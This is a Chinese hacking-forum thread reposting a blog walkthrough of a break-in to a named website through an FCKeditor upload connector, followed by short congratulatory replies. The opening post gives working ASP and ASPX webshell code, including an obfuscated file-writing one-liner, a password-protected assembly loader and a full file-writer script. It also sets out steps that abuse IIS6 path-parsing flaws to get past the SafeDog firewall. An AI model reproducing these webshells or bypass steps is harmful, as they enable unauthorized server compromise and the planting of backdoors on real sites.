Fck漏洞突破安全狗漏洞

kades · 发表于 2013-2-18 17:44:48

1http://www.si1ence.cn/ fckeditor/editor/filemanager/connectors/test.html
FCKeditor的browser被删了，但是connector和测试页面都在，那就没问题了。
准备一个图片马，命名为a.asp;.gif然后上传，FCK自动重命名为a_asp;.gif，遇到这种情况，同一个文件再传一遍，文件就自动重命名为a.asp;(1).gif。
但是访问：
1http:// www.si1ence.cn / YourUploadFilePath/file/a.asp;(1).gif
却弹出提示：
您的请求带有不合法的参数，谢谢合作！
来自安全狗互联网安全实验室-网站安全狗软件的友好提示，了解更多请点击
不过看到朋友已经把.asp文件夹建好了。直接传个图片到/shell.asp/这个文件夹，利用iis6的解析漏洞，就可以解析成asp了，而且绕过了安全狗。
不过知道好多马儿都上不去，菜刀一句话也403没辙。干脆就用别的了。建立shell.asp畸形文件夹的办法可以参考：《解决Fckeditor删除所有上传页面如何上传入侵》
1<%If request("cmd")<>"" And request("path")<>"" then Createobject("Scri"&"pting.FileSys"&"temObject").CreateTextFile(server.mappath(request("path"))).WriteLine request("cmd")%>
这是上传文件的一句话服务端，这个一句话可以用习科开发的asp上传类一句话ShellClient连接并上传文件。点此下载：shellclient
除了这个工具，“ASPX一句话shell客户端”这个工具也可以完美的绕过安全狗。
这个aspx的服务端是：
1<%@ Page Language="C#" ValidateRequest="false" %>

2<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["psw"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
密码是psw，但是现在上传后门是在/shell.asp/这个目录，如果命名aspx是500不解析的。如果加分号，对aspx也是没用的。
在“新后门”那里如果写xxx.asp,xxx.asa,xxx.cer都没问题，但是上传../xxx.aspx这样的把目录转出去到/shell.asp/文件夹外面的话就失败了
想想怎么把aspx的后门写到/shell.asp/目录外面。用了个小马：
01<%

02dim objFSO

03dim fdata

04dim objCountFile

05on error resume next

06Set objFSO = Server.CreateObject("Scripting.FileSystemObject")

07if Trim(request("systempath"))<>"" then

08fdata = request("sAvedata")

09Set objCountFile=objFSO.CreateTextFile(request("systempath"),True)

10objCountFile.Write fdata

11if err =0 then

12response.write "<font color=red>保存成功!</font>"

13else

14response.write "<font color=red>保存失败!</font>"

15end if

16err.clear

17end if

18objCountFile.Close

19Set objCountFile=Nothing

20Set objFSO = Nothing

21Response.write "<form action='' method=post>"

22Response.write "保存文件的<font color=red>绝对路径(包括文件名:如D:\web\x.asp):</font>"

23Response.Write "<input type=text name=systempath width=32 size=50>"

24Response.Write "<br>"

25Response.write "本文件绝对路径"

26Response.write server.mappath(Request.ServerVariables("SCRIPT_NAME"))

27Response.write "<br>"

28Response.write "输入马的内容:"

29Response.write "<textarea name=sAvedata cols=80 rows=10 width=32></textarea>"

30Response.write "<input type=submit value=保存>"

31Response.write "</form>"

32%>
这样就把aspx的马写到外面了
asp上传大马会提示危险参数禁止上传，但是用这个aspx就没问题了。只需要cmd拷贝一下就可以了。asp的大马轻松运行无压力。
这个站我真的没有被安全狗难倒，秒杀。有些东西只是纸老虎而已
本文来源于si1ence'blog , 原文地址：http://www.si1ence.cn/wangluoanquan/471/

名哲 · 发表于 2013-2-18 17:58:23

{:soso_e121:}好大的K 我是看到微博你的动态才看到论坛好吧我OUT了

kades · 发表于 2013-2-18 18:24:24

名哲发表于 2013-2-18 17:58
好大的K 我是看到微博你的动态才看到论坛好吧我OUT了

我也来08小组打打酱油啦呵呵

08-土豆 · 发表于 2013-2-18 21:56:02

支持大牛~~~~~~~~~~~~~ 嘿嘿

冰河 · 发表于 2013-2-18 22:18:45

文章不错，不过我看的原文。哈哈楼主整理下帖子格式就好了！

clocks · 发表于 2013-2-25 09:33:25

很给力啊！谢谢！

clocks · 发表于 2013-2-25 09:33:40

很给力啊！谢谢！

Fck漏洞突破安全狗漏洞

点评

点评

指导单位

旗下站点

联系我们